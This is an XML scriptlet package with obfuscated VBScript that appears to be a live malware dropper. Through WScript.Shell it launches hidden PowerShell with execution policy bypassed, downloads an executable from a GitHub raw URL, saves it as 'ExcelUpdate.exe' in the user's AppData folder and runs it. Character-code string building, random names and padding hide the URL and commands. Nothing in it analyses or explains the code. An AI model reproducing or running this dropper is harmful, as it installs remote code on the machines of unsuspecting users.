<?xml version="1.0"?>
<package>
<component id="lkwPAjczbWfJHWXUXsSVaiOthuvPiMvNHyXqKr6484878775774635622782348067017101749">
<script language="VbscrIPt">
<![CDATA[
dIM                  xfdyyzhcwmnpxoq                  :                  DiM                  ehruogmqmexztpf                  :                  seT                  xfdyyzhcwmnpxoq                  =                  CreateObjeCT                  (                  ChrW(&H57) & ChrW(&H73) & Chr(&H63) & Chr(&H52) & ChrW(&H49) & ChrW(&H50) & Chr(&H54) & ChrW(&H2E) & ChrW(&H53) & ChrW(&H68) & ChrW(&H65) & ChrW(&H4C) & Chr(&H6C)                  )                  :                  ehruogmqmexztpf                  =                  " 	 poWErshell.exe    -EX	byPasS	  -nOP	  -W	1 		SEt-COntENt	  -VA   (	 	NEW-ObJECt 	 ( 		'ne'	  	  +	  't.wEbClIen'	  	  +	  'T'	  		 )).(		 'd'  	  	+  	'owNLOad'  	  	+  	'datA'  				).InVoKE(			([chAr]   0X68      +   [chaR]   0X74      +   [CHAR]   0x74      +   [chAR]   0X70      +   [ChaR]   0X73      +   [CHaR]   0x3A      +   [cHaR]   0x2F      +   [CHAr]   0x2F      +   [cHAr]   0X67      +   [CHar]   0x69      +   [chAR]   0X74      +   [cHAr]   0x68      +   [ChaR]   0x75      +   [CHaR]   0X62      +   [ChAR]   0X2E      +   [Char]   0x63      +   [cHar]   0x6F      +   [cHar]   0x6D      +   [chAr]   0x2F      +   [cHar]   0X45      +   [CHAr]   0X63      +   [CHAR]   0x55      +   [Char]   0x53      +   [CHaR]   0x45      +   [cHaR]   0X6D      +   [cHar]   0x62      +   [CHAR]   0x61      +   [chAr]   0X73      +   [CHAr]   0X73      +   [char]   0x79      +   [cHAR]   0x2F      +   [Char]   0x4B      +   [chAR]   0X72      +   [cHAr]   0x61      +   [chAR]   0X6B      +   [cHAR]   0x65      +   [CHAR]   0x6E      +   [CHaR]   0X2F      +   [cHar]   0X72      +   [cHar]   0x61      +   [chAR]   0X77      +   [cHAR]   0x2F      +   [chAr]   0X6D      +   [chaR]   0x61      +   [ChaR]   0X73      +   [ChAr]   0x74      +   [chAr]   0X65      +   [ChAR]   0x72      +   [chaR]   0x2F      +   [cHAR]   0x45      +   [CHAR]   0x78      +   [cHaR]   0x63      +   [Char]   0X65      +   [chaR]   0X6C      +   [CHAR]   0X55      +   [CHAR]   0X70      +   [cHAr]   0X64      +   [CHAr]   0X34      +   [CHAr]   0X2E      +   [ChaR]   0x65      +   [ChAR]   0X78      +   [ChAr]   0x65   )	 	)   -En  	( 	 'BY'	 		 	+	 	'TE'	 			 )   -pATH  	'%APPDATa%\ExcelUpdate.exe'   ;   iNvokE-expRESsION	 	'%apPDATa%\ExcelUpdate.exe'"                  :                  xfdyyzhcwmnpxoq.rUn                  CHR                  (                  34                  )                  &                  xfdyyzhcwmnpxoq.eXPaNDENVIroNmeNtstRingS(                  Chr(&H25) & ChrW(&H43) & ChrW(&H6F) & ChrW(&H4D) & ChrW(&H73) & ChrW(&H70) & ChrW(&H45) & Chr(&H63) & Chr(&H25)                  )                  &                  cHr                  (                  34                  )                  &                  Chr                  (                  34                  )                  &                  ChrW(&H2F) & Chr(&H43) & Chr(&H20)                  &                  ehruogmqmexztpf                  &                  chR                  (                  34                  )                  ,                  0                  :                  seT                  xfdyyzhcwmnpxoq                  =                  notHING
]]>
</script>
<body>

</body>
</component>
</package>